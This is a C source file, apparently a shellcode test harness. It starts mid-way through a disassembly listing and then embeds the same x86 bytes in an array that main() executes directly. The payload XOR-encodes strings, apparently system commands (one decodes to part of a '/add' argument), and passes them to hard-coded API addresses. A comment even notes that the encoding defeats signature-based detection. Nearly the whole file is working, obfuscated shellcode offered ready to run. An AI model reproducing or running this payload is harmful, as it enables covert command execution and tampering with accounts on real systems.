$0x8,%eax 
124: c1 e8 08 shr $0x8,%eax 127: 50 push %eax 128: b9 02 63 6b 35 mov $0x356b6302,%ecx 12d: ba 4b 43 44 54 mov $0x5444434b,%edx 132: 31 d1 xor %edx,%ecx 134: 51 push %ecx 135: b9 61 55 6c 3d mov $0x3d6c5561,%ecx 13a: ba 43 75 2d 71 mov $0x712d7543,%edx 13f: 31 d1 xor %edx,%ecx 141: 51 push %ecx 142: b9 27 3f 3b 1a mov $0x1a3b3f27,%ecx 147: ba 54 5a 49 69 mov $0x69495a54,%edx 14c: 31 d1 xor %edx,%ecx 14e: 51 push %ecx 14f: b9 25 34 12 67 mov $0x67123425,%ecx 154: ba 4a 44 32 32 mov $0x3232444a,%edx 159: 31 d1 xor %edx,%ecx 15b: 51 push %ecx 15c: b9 0b 02 1f 19 mov $0x191f020b,%ecx 161: ba 6e 71 74 6d mov $0x6d74716e,%edx 166: 31 d1 xor %edx,%ecx 168: 51 push %ecx 169: b9 39 3f 7b 15 mov $0x157b3f39,%ecx 16e: ba 4d 5a 5b 51 mov $0x515b5a4d,%edx 173: 31 d1 xor %edx,%ecx 175: 51 push %ecx 176: b9 35 15 03 2a mov $0x2a031535,%ecx 17b: ba 67 70 6e 45 mov $0x456e7067,%edx 180: 31 d1 xor %edx,%ecx 182: 51 push %ecx 183: b9 3a 17 75 46 mov $0x4675173a,%ecx 188: ba 6f 47 55 64 mov $0x6455476f,%edx 18d: 31 d1 xor %edx,%ecx 18f: 51 push %ecx 190: b9 26 35 0b 1e mov $0x1e0b3526,%ecx 195: ba 6a 72 59 51 mov $0x5159726a,%edx 19a: 31 d1 xor %edx,%ecx 19c: 51 push %ecx 19d: b9 2a 2a 06 2a mov $0x2a062a2a,%ecx 1a2: ba 66 65 45 6b mov $0x6b456566,%edx 1a7: 31 d1 xor %edx,%ecx 1a9: 51 push %ecx 1aa: b9 1d 20 35 5a mov $0x5a35201d,%ecx 1af: ba 53 65 61 7a mov $0x7a616553,%edx 1b4: 31 d1 xor %edx,%ecx 1b6: 51 push %ecx 1b7: 89 e0 mov %esp,%eax 1b9: bb 41 41 41 01 mov $0x1414141,%ebx 1be: c1 eb 08 shr $0x8,%ebx 1c1: c1 eb 08 shr $0x8,%ebx 1c4: c1 eb 08 shr $0x8,%ebx 1c7: 53 push %ebx 1c8: 50 push %eax 1c9: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 1ce: ba 33 52 64 59 mov $0x59645233,%edx 1d3: 31 d3 xor %edx,%ebx 1d5: ff d3 call *%ebx 1d7: 31 c0 xor %eax,%eax 1d9: 50 push %eax 1da: b9 09 4c 7c 5e mov $0x5e7c4c09,%ecx 1df: ba 38 6c 53 38 mov $0x38536c38,%edx 1e4: 31 d1 xor %edx,%ecx 1e6: 51 push %ecx 1e7: b9 42 4d 39 14 mov $0x14394d42,%ecx 1ec: ba 62 62 5d 34 mov $0x345d6262,%edx 1f1: 31 d1 xor 
%edx,%ecx 1f3: 51 push %ecx 1f4: b9 7a 24 26 75 mov $0x7526247a,%ecx 1f9: ba 2d 6b 74 31 mov $0x31746b2d,%edx 1fe: 31 d1 xor %edx,%ecx 200: 51 push %ecx 201: b9 1d 30 15 28 mov $0x2815301d,%ecx 206: ba 58 77 4a 6c mov $0x6c4a7758,%edx 20b: 31 d1 xor %edx,%ecx 20d: 51 push %ecx 20e: b9 7c 2f 57 16 mov $0x16572f7c,%ecx 213: ba 53 5b 77 44 mov $0x44775b53,%edx 218: 31 d1 xor %edx,%ecx 21a: 51 push %ecx 21b: b9 42 25 2a 66 mov $0x662a2542,%ecx 220: ba 2d 4b 59 46 mov $0x46594b2d,%edx 225: 31 d1 xor %edx,%ecx 227: 51 push %ecx 228: b9 28 2f 0c 5a mov $0x5a0c2f28,%ecx 22d: ba 4d 4c 78 33 mov $0x33784c4d,%edx 232: 31 d1 xor %edx,%ecx 234: 51 push %ecx 235: b9 20 2b 26 26 mov $0x26262b20,%ecx 23a: ba 63 44 48 48 mov $0x48484463,%edx 23f: 31 d1 xor %edx,%ecx 241: 51 push %ecx 242: b9 08 2b 23 67 mov $0x67232b08,%ecx 247: ba 66 52 77 34 mov $0x34775266,%edx 24c: 31 d1 xor %edx,%ecx 24e: 51 push %ecx 24f: b9 49 1c 2e 48 mov $0x482e1c49,%ecx 254: ba 69 7a 6a 2d mov $0x2d6a7a69,%edx 259: 31 d1 xor %edx,%ecx 25b: 51 push %ecx 25c: b9 67 67 1d 37 mov $0x371d6767,%ecx 261: ba 45 47 32 41 mov $0x41324745,%edx 266: 31 d1 xor %edx,%ecx 268: 51 push %ecx 269: b9 03 33 0d 3b mov $0x3b0d3303,%ecx 26e: ba 71 45 68 49 mov $0x49684571,%edx 273: 31 d1 xor %edx,%ecx 275: 51 push %ecx 276: b9 39 6a 3c 2f mov $0x2f3c6a39,%ecx 27b: ba 55 4a 6f 4a mov $0x4a6f4a55,%edx 280: 31 d1 xor %edx,%ecx 282: 51 push %ecx 283: b9 37 44 1f 2e mov $0x2e1f4437,%ecx 288: ba 5a 2d 71 4f mov $0x4f712d5a,%edx 28d: 31 d1 xor %edx,%ecx 28f: 51 push %ecx 290: b9 34 23 23 3b mov $0x3b232334,%ecx 295: ba 68 77 46 49 mov $0x49467768,%edx 29a: 31 d1 xor %edx,%ecx 29c: 51 push %ecx 29d: b9 07 3a 0a 14 mov $0x140a3a07,%ecx 2a2: ba 73 48 65 78 mov $0x78654873,%edx 2a7: 31 d1 xor %edx,%ecx 2a9: 51 push %ecx 2aa: b9 14 2e 58 53 mov $0x53582e14,%ecx 2af: ba 48 6d 37 3d mov $0x3d376d48,%edx 2b4: 31 d1 xor %edx,%ecx 2b6: 51 push %ecx 2b7: b9 3e 3d 26 32 mov $0x32263d3e,%ecx 2bc: ba 52 6e 43 46 mov $0x46436e52,%edx 2c1: 31 d1 xor 
%edx,%ecx 2c3: 51 push %ecx 2c4: b9 33 3c 35 34 mov $0x34353c33,%ecx 2c9: ba 5d 48 47 5b mov $0x5b47485d,%edx 2ce: 31 d1 xor %edx,%ecx 2d0: 51 push %ecx 2d1: b9 36 0e 07 2b mov $0x2b070e36,%ecx 2d6: ba 58 7a 44 44 mov $0x44447a58,%edx 2db: 31 d1 xor %edx,%ecx 2dd: 51 push %ecx 2de: b9 3c 10 0a 37 mov $0x370a103c,%ecx 2e3: ba 49 62 78 52 mov $0x52786249,%edx 2e8: 31 d1 xor %edx,%ecx 2ea: 51 push %ecx 2eb: b9 24 7c 3b 36 mov $0x363b7c24,%ecx 2f0: ba 61 31 67 75 mov $0x75673161,%edx 2f5: 31 d1 xor %edx,%ecx 2f7: 51 push %ecx 2f8: b9 31 3d 3b 27 mov $0x273b3d31,%ecx 2fd: ba 62 64 68 73 mov $0x73686462,%edx 302: 31 d1 xor %edx,%ecx 304: 51 push %ecx 305: b9 7f 7d 3d 35 mov $0x353d7d7f,%ecx 30a: ba 36 33 78 69 mov $0x69783336,%edx 30f: 31 d1 xor %edx,%ecx 311: 51 push %ecx 312: b9 7c 13 0f 2f mov $0x2f0f137c,%ecx 317: ba 31 52 4c 67 mov $0x674c5231,%edx 31c: 31 d1 xor %edx,%ecx 31e: 51 push %ecx 31f: b9 1b 08 35 2d mov $0x2d35081b,%ecx 324: ba 58 49 79 72 mov $0x72794958,%edx 329: 31 d1 xor %edx,%ecx 32b: 51 push %ecx 32c: b9 74 3a 1e 21 mov $0x211e3a74,%ecx 331: ba 2d 65 52 6e mov $0x6e52652d,%edx 336: 31 d1 xor %edx,%ecx 338: 51 push %ecx 339: b9 16 10 1f 17 mov $0x171f1016,%ecx 33e: ba 34 58 54 52 mov $0x52545834,%edx 343: 31 d1 xor %edx,%ecx 345: 51 push %ecx 346: b9 2f 27 0c 6e mov $0x6e0c272f,%ecx 34b: ba 4e 43 68 4e mov $0x4e68434e,%edx 350: 31 d1 xor %edx,%ecx 352: 51 push %ecx 353: b9 39 22 5e 50 mov $0x505e2239,%ecx 358: ba 4b 47 39 70 mov $0x7039474b,%edx 35d: 31 d1 xor %edx,%ecx 35f: 51 push %ecx 360: 89 e0 mov %esp,%eax 362: bb 41 41 41 01 mov $0x1414141,%ebx 367: c1 eb 08 shr $0x8,%ebx 36a: c1 eb 08 shr $0x8,%ebx 36d: c1 eb 08 shr $0x8,%ebx 370: 53 push %ebx 371: 50 push %eax 372: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 377: ba 33 52 64 59 mov $0x59645233,%edx 37c: 31 d3 xor %edx,%ebx 37e: ff d3 call *%ebx 380: 31 c0 xor %eax,%eax 382: 50 push %eax 383: b8 41 41 41 65 mov $0x65414141,%eax 388: c1 e8 08 shr $0x8,%eax 38b: c1 e8 08 shr $0x8,%eax 38e: c1 e8 08 shr 
$0x8,%eax 391: 50 push %eax 392: b9 1e 53 39 3c mov $0x3c39531e,%ecx 397: ba 6d 32 5b 50 mov $0x505b326d,%edx 39c: 31 d1 xor %edx,%ecx 39e: 51 push %ecx 39f: b9 04 66 2f 32 mov $0x322f6604,%ecx 3a4: ba 61 46 4b 5b mov $0x5b4b4661,%edx 3a9: 31 d1 xor %edx,%ecx 3ab: 51 push %ecx 3ac: b9 19 1e 0d 11 mov $0x110d1e19,%ecx 3b1: ba 69 73 62 75 mov $0x75627369,%edx 3b6: 31 d1 xor %edx,%ecx 3b8: 51 push %ecx 3b9: b9 20 41 47 36 mov $0x36474120,%ecx 3be: ba 45 35 67 59 mov $0x59673545,%edx 3c3: 31 d1 xor %edx,%ecx 3c5: 51 push %ecx 3c6: b9 2b 05 64 2a mov $0x2a64052b,%ecx 3cb: ba 47 69 44 59 mov $0x59446947,%edx 3d0: 31 d1 xor %edx,%ecx 3d2: 51 push %ecx 3d3: b9 10 3f 4f 22 mov $0x224f3f10,%ecx 3d8: ba 62 5a 38 43 mov $0x43385a62,%edx 3dd: 31 d1 xor %edx,%ecx 3df: 51 push %ecx 3e0: b9 2a 6f 2a 24 mov $0x242a6f2a,%ecx 3e5: ba 42 4f 4c 4d mov $0x4d4c4f42,%edx 3ea: 31 d1 xor %edx,%ecx 3ec: 51 push %ecx 3ed: b9 29 09 1e 5e mov $0x5e1e0929,%ecx 3f2: ba 47 6c 6a 2d mov $0x2d6a6c47,%edx 3f7: 31 d1 xor %edx,%ecx 3f9: 51 push %ecx 3fa: 89 e0 mov %esp,%eax 3fc: bb 41 41 41 01 mov $0x1414141,%ebx 401: c1 eb 08 shr $0x8,%ebx 404: c1 eb 08 shr $0x8,%ebx 407: c1 eb 08 shr $0x8,%ebx 40a: 53 push %ebx 40b: 50 push %eax 40c: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 411: ba 33 52 64 59 mov $0x59645233,%edx 416: 31 d3 xor %edx,%ebx 418: ff d3 call *%ebx 41a: 31 c0 xor %eax,%eax 41c: 50 push %eax 41d: b8 41 41 41 6f mov $0x6f414141,%eax 422: c1 e8 08 shr $0x8,%eax 425: c1 e8 08 shr $0x8,%eax 428: c1 e8 08 shr $0x8,%eax 42b: 50 push %eax 42c: b9 72 2a 05 39 mov $0x39052a72,%ecx 431: ba 52 4b 70 4d mov $0x4d704b52,%edx 436: 31 d1 xor %edx,%ecx 438: 51 push %ecx 439: b9 54 3a 05 52 mov $0x52053a54,%ecx 43e: ba 35 48 71 6f mov $0x6f714835,%edx 443: 31 d1 xor %edx,%ecx 445: 51 push %ecx 446: b9 29 16 0a 47 mov $0x470a1629,%ecx 44b: ba 4c 36 79 33 mov $0x3379364c,%edx 450: 31 d1 xor %edx,%ecx 452: 51 push %ecx 453: b9 27 1b 5b 3e mov $0x3e5b1b27,%ecx 458: ba 55 6d 32 5d mov $0x5d326d55,%edx 45d: 31 d1 xor 
%edx,%ecx 45f: 51 push %ecx 460: b9 33 1a 3b 10 mov $0x103b1a33,%ecx 465: ba 41 77 48 75 mov $0x75487741,%edx 46a: 31 d1 xor %edx,%ecx 46c: 51 push %ecx 46d: b9 34 79 3a 12 mov $0x123a7934,%ecx 472: ba 53 59 4e 77 mov $0x774e5953,%edx 477: 31 d1 xor %edx,%ecx 479: 51 push %ecx 47a: b9 1d 5c 1e 28 mov $0x281e5c1d,%ecx 47f: ba 72 32 78 41 mov $0x41783272,%edx 484: 31 d1 xor %edx,%ecx 486: 51 push %ecx 487: b9 2a 4e 5a 28 mov $0x285a4e2a,%ecx 48c: ba 59 2d 7a 4b mov $0x4b7a2d59,%edx 491: 31 d1 xor %edx,%ecx 493: 51 push %ecx 494: 89 e0 mov %esp,%eax 496: bb 41 41 41 01 mov $0x1414141,%ebx 49b: c1 eb 08 shr $0x8,%ebx 49e: c1 eb 08 shr $0x8,%ebx 4a1: c1 eb 08 shr $0x8,%ebx 4a4: 53 push %ebx 4a5: 50 push %eax 4a6: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 4ab: ba 33 52 64 59 mov $0x59645233,%edx 4b0: 31 d3 xor %edx,%ebx 4b2: ff d3 call *%ebx 4b4: bb f9 7e 5e 22 mov $0x225e7ef9,%ebx 4b9: ba 36 54 3d 54 mov $0x543d5436,%edx 4be: 31 d3 xor %edx,%ebx 4c0: ff d3 call *%ebx */
#include <stdio.h>
#include <string.h>

/*
 * Harness: prints the length of the byte array below and then transfers
 * control into it.
 *
 * Notes for anyone auditing this sample:
 *  - The listing above shows the bytes are built from pairs of constants
 *    that are XOR-ed together before being pushed (mov/mov/xor/push), and
 *    the indirect call targets (`call *%ebx`) are derived the same way;
 *    the raw array therefore contains neither the decoded strings nor the
 *    final addresses, which matters for signature-based detection.
 *  - strlen() stops at the first 0x00 byte, so the printed "Length" equals
 *    the array size only if no NUL byte occurs in the payload.
 *  - "%d" is paired with a size_t argument (strlen's return type); the
 *    matching conversion specifier is "%zu".
 *  - Converting a data pointer to a function pointer and calling through it
 *    is undefined behaviour in ISO C; whether control actually transfers
 *    depends on the memory protection the toolchain and OS apply to the
 *    array.
 */
int main(){
/* The byte sequence disassembled in the comment block above. */
unsigned char shellcode[]=
"\x31\xc0\x50\xb8\x41\x41\x41\x64\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x6d\x76\x53\x52\xba\x4d\x59\x32\x36\x31\xd1\x51\xb9\x6e\x72\x61\x71\xba\x4e\x33\x2d\x38\x31\xd1\x51\xb9\x6c\x75\x78\x78\xba\x4c\x34\x34\x31\x31\xd1\x51\xb9\x46\x47\x57\x46\xba\x33\x34\x32\x34\x31\xd1\x51\xb9\x56\x50\x47\x64\xba\x38\x35\x33\x44\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x01\x41\x60\x32\xba\x48\x61\x4f\x53\x31\xd1\x51\xb9\x28\x47\x0d\x2f\xba\x5b\x67\x4c\x63\x31\xd1\x51\xb9\x03\x24\x36\x21\xba\x62\x50\x59\x53\x31\xd1\x51\xb9\x34\x41\x15\x18\xba\x5d\x32\x61\x6a\x31\xd1\x51\xb9\x0c\x05\x1b\x25\xba\x68\x68\x72\x4b\x31\xd1\x51\xb9\x2f\x27\x7b\x13\xba\x5a\x57\x5b\x52\x31\xd1\x51\xb9\x1c\x2c\x02\x3e\xba\x70\x4b\x70\x51\x31\xd1\x51\xb9\x3d\x2a\x32\x4c\xba\x51\x45\x51\x2d\x31\xd1\x51\xb9\x23\x5c\x1c\x19\xba\x4d\x39\x68\x39\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x02\x63\x6b\x35\xba\x4b\x43\x44\x54\x31\xd1\x51\xb9\x61\x55\x6c\x3d\xba\x43\x75\x2d\x71\x31\xd1\x51\xb9\x27\x3f\x3b\x1a\xba\x54\x5a\x49\x69\x31\xd1\x51\xb9\x25\x34\x12\x67\xba\x4a\x44\x32\x32\x31\xd1\x51\xb9\x0b\x02\x1f\x19\xba\x6e\x71\x74\x6d\x31\xd1\x51\xb9\x39\x3f\x7b\x15\xba\x4d\x5a\x5b\x51\x31\xd1\x51\xb9\x35\x15\x03\x2a\xba\x67\x70\x6e\x45\x31\xd1\x51\xb9\x3a\x17\x75\x46\xba\x6f\x47\x55\x64\x31\xd1\x51\xb9\x26\x35\x0b\x1e\xba\x6a\x72\x59\x51\x31\xd1\x51\xb9\x2a\x2a\x06\x2a\xba\x66\x65\x45\x6b\x31\xd1\x51\xb9\x1d\x20\x35\x5a\xba\x53\x65\x61\x7a\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb9\x09\x4c\x7c\x5e\xba\x38\x6c\x53\x38\x31\xd1\x51\xb9\x42\x4d\x39\x14\xba\x62\x62\x5d\x34\x31\xd1\x51\xb9\x7a\x24\x26\x75\xba\x2d\x6b\x74\x31\x31\xd1\x51\xb9\x1d\x30\x15\x28\xba\x58\x77\x4a\x6c\x31\xd1\x51\xb9\x7c\x2f\x57\x16\xba\x53\x5b\x77\x44\x31\xd1\x51\xb9\x42\x25\x2a\x66\xba\x2d\x4b\x59\x46\x31\xd1\x51\xb9\x28\x2f\x0c\x5a\xba\x4d\x4c\x78\x33\x31\xd1\x51\xb9\x20\x2b\x26\x26\xba\x63\x44\x48\x48\x31\xd1\x51\xb9\x08\x2b\x23\x67\xba\x66\x52\x77\x34\x31\xd1\x51\xb9\x49\x1c\x2e\x48\xba\x69\x7a\x6a\x2d\x31\xd1\x51\xb9\x67\x67\x1d\x37\xba\x45\x47\x32\x41\x31\xd1\x51\xb9\x03\x33\x0d\x3b\xba\x71\x45\x68\x49\x31\xd1\x51\xb9\x39\x6a\x3c\x2f\xba\x55\x4a\x6f\x4a\x31\xd1\x51\xb9\x37\x44\x1f\x2e\xba\x5a\x2d\x71\x4f\x31\xd1\x51\xb9\x34\x23\x23\x3b\xba\x68\x77\x46\x49\x31\xd1\x51\xb9\x07\x3a\x0a\x14\xba\x73\x48\x65\x78\x31\xd1\x51\xb9\x14\x2e\x58\x53\xba\x48\x6d\x37\x3d\x31\xd1\x51\xb9\x3e\x3d\x26\x32\xba\x52\x6e\x43\x46\x31\xd1\x51\xb9\x33\x3c\x35\x34\xba\x5d\x48\x47\x5b\x31\xd1\x51\xb9\x36\x0e\x07\x2b\xba\x58\x7a\x44\x44\x31\xd1\x51\xb9\x3c\x10\x0a\x37\xba\x49\x62\x78\x52\x31\xd1\x51\xb9\x24\x7c\x3b\x36\xba\x61\x31\x67\x75\x31\xd1\x51\xb9\x31\x3d\x3b\x27\xba\x62\x64\x68\x73\x31\xd1\x51\xb9\x7f\x7d\x3d\x35\xba\x36\x33\x78\x69\x31\xd1\x51\xb9\x7c\x13\x0f\x2f\xba\x31\x52\x4c\x67\x31\xd1\x51\xb9\x1b\x08\x35\x2d\xba\x58\x49\x79\x72\x31\xd1\x51\xb9\x74\x3a\x1e\x21\xba\x2d\x65\x52\x6e\x31\xd1\x51\xb9\x16\x10\x1f\x17\xba\x34\x58\x54\x52\x31\xd1\x51\xb9\x2f\x27\x0c\x6e\xba\x4e\x43\x68\x4e\x31\xd1\x51\xb9\x39\x22\x5e\x50\xba\x4b\x47\x39\x70\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x65\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x1e\x53\x39\x3c\xba\x6d\x32\x5b\x50\x31\xd1\x51\xb9\x04\x66\x2f\x32\xba\x61\x46\x4b\x5b\x31\xd1\x51\xb9\x19\x1e\x0d\x11\xba\x69\x73\x62\x75\x31\xd1\x51\xb9\x20\x41\x47\x36\xba\x45\x35\x67\x59\x31\xd1\x51\xb9\x2b\x05\x64\x2a\xba\x47\x69\x44\x59\x31\xd1\x51\xb9\x10\x3f\x4f\x22\xba\x62\x5a\x38\x43\x31\xd1\x51\xb9\x2a\x6f\x2a\x24\xba\x42\x4f\x4c\x4d\x31\xd1\x51\xb9\x29\x09\x1e\x5e\xba\x47\x6c\x6a\x2d\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x6f\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x72\x2a\x05\x39\xba\x52\x4b\x70\x4d\x31\xd1\x51\xb9\x54\x3a\x05\x52\xba\x35\x48\x71\x6f\x31\xd1\x51\xb9\x29\x16\x0a\x47\xba\x4c\x36\x79\x33\x31\xd1\x51\xb9\x27\x1b\x5b\x3e\xba\x55\x6d\x32\x5d\x31\xd1\x51\xb9\x33\x1a\x3b\x10\xba\x41\x77\x48\x75\x31\xd1\x51\xb9\x34\x79\x3a\x12\xba\x53\x59\x4e\x77\x31\xd1\x51\xb9\x1d\x5c\x1e\x28\xba\x72\x32\x78\x41\x31\xd1\x51\xb9\x2a\x4e\x5a\x28\xba\x59\x2d\x7a\x4b\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\xbb\xf9\x7e\x5e\x22\xba\x36\x54\x3d\x54\x31\xd3\xff\xd3";
/* Reports the NUL-terminated length, not sizeof(); see the note above on strlen() and "%d". */
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
/* Data-to-function-pointer cast followed by an indirect call into the array (undefined behaviour in ISO C). */
(*(void(*)()) shellcode)();
}